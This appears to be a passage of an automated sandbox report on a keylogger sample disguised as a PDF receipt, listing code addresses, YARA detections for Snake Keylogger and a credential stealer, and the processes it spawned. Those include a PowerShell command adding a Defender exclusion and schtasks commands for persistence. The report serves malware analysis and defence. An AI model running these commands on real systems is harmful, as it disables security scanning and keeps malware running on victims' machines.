                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FEB5111_2_055FEB51
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FAB4311_2_055FAB43
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FEB6011_2_055FEB60
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F0B3011_2_055F0B30
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F0B2011_2_055F0B20
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FD47011_2_055FD470
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FD46011_2_055FD460
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF41011_2_055FF410
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF40111_2_055FF401
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FDD1311_2_055FDD13
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055F9D0011_2_055F9D00
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FDD2011_2_055FDD20
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF85811_2_055FF858
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FF86711_2_055FF867
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_055FD8C811_2_055FD8C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06787CA811_2_06787CA8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678F36811_2_0678F368
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678798811_2_06787988
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678766811_2_06787668
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678BE4811_2_0678BE48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06783E2811_2_06783E28
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678860811_2_06788608
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06781EE811_2_06781EE8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678E6E811_2_0678E6E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678E6D811_2_0678E6D8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067866C811_2_067866C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678AEA811_2_0678AEA8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06782E8811_2_06782E88
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06788F6811_2_06788F68
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06788F5711_2_06788F57
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06780F4811_2_06780F48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678D74811_2_0678D748
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678572811_2_06785728
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06789F0811_2_06789F08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067837E811_2_067837E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06787FC811_2_06787FC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678C7A811_2_0678C7A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678478811_2_06784788
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678446811_2_06784468
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678445811_2_06784458
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06788C4811_2_06788C48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06780C2811_2_06780C28
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678D42811_2_0678D428
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678540811_2_06785408
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678B4E811_2_0678B4E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067834C811_2_067834C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678C48811_2_0678C488
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06785D6811_2_06785D68
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A54811_2_0678A548
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A53811_2_0678A538
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678252811_2_06782528
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678ED2811_2_0678ED28
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06786D0811_2_06786D08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067805E811_2_067805E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678CDE811_2_0678CDE8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06784DC811_2_06784DC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067895A811_2_067895A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678158811_2_06781588
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678DD8811_2_0678DD88
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678927811_2_06789278
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678126811_2_06781268
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678DA6811_2_0678DA68
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06785A4811_2_06785A48
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A22811_2_0678A228
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678220811_2_06782208
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678EA0811_2_0678EA08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067882E811_2_067882E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067802C811_2_067802C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678CAC811_2_0678CAC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06784AA811_2_06784AA8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678928811_2_06789288
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06782B6811_2_06782B68
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678734811_2_06787348
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678BB2811_2_0678BB28
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678BB1811_2_0678BB18
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06783B0811_2_06783B08
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06789BE811_2_06789BE8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06781BC811_2_06781BC8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678E3C811_2_0678E3C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_06781BB811_2_06781BB8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067863A811_2_067863A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678AB8811_2_0678AB88
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A86811_2_0678A868
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678A86211_2_0678A862
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678284811_2_06782848
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678F04811_2_0678F048
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678702811_2_06787028
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678B80811_2_0678B808
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678000711_2_06780007
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067850E811_2_067850E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067898C811_2_067898C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067818A811_2_067818A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678E0A811_2_0678E0A8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678608811_2_06786088
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678C16811_2_0678C168
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678C15A11_2_0678C15A
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678414811_2_06784148
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678413711_2_06784137
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678892811_2_06788928
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678090811_2_06780908
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678D10811_2_0678D108
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067869E811_2_067869E8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_0678B1C811_2_0678B1C8
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exeCode function: 11_2_067831A811_2_067831A8
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1722656891.0000000001336000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameschtasks.exej% vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1728804720.00000000080A0000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameCaptive.dll" vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1724559523.0000000003161000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000000.1691739920.0000000000E14000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFilenameIzLJ.exe" vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1731029741.000000000A050000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1722563272.00000000012CE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameclr.dllT vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCaptive.dll" vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameMontero.dll8 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148166401.0000000000444000.00000040.00000400.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameRemington.exe4 vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, 00000006.00000002.4148609258.0000000000B37000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, Binary or memory string: OriginalFilenameIzLJ.exe" vs rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.teXfNv.exe.4245570.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.teXfNv.exe.4288990.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.teXfNv.exe.4245570.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.teXfNv.exe.4288990.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4c070f8.1.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.49b4148.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.rDEKONT-1_16_2025__75kb__pdf.exe.4994128.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000008.00000002.1766895440.0000000004241000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1725618218.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: rDEKONT-1_16_2025__75kb__pdf.exe PID: 7328, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: teXfNv.exe PID: 7888, type: MEMORYSTR, Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: teXfNv.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engine, Classification label: mal100.troj.spyw.evad.winEXE@16/11@3/3
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, File created: C:\Users\user\AppData\Roaming\teXfNv.exe
                  Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7964:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe, Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, File created: C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, Virustotal: Detection: 27%
                  Source: rDEKONT-1_16_2025__75kb__pdf.exe, ReversingLabs: Detection: 26%
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, File read: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe
                  Source: unknown, Process created: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\teXfNv.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpB0EF.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe, Process created: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe "C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: unknown, Process created: C:\Users\user\AppData\Roaming\teXfNv.exe C:\Users\user\AppData\Roaming\teXfNv.exe
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe, Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\teXfNv" /XML "C:\Users\user\AppData\Local\Temp\tmpC16A.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\teXfNv.exe, Process created: C:\Users\user\AppData\Roaming\teXfNv.exe "C:\Users\user\AppData\Roaming\teXfNv.exe"
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\rDEKONT-1_16_2025__75kb__pdf.exeSection loaded: windowscodecs.dllJump to behavior
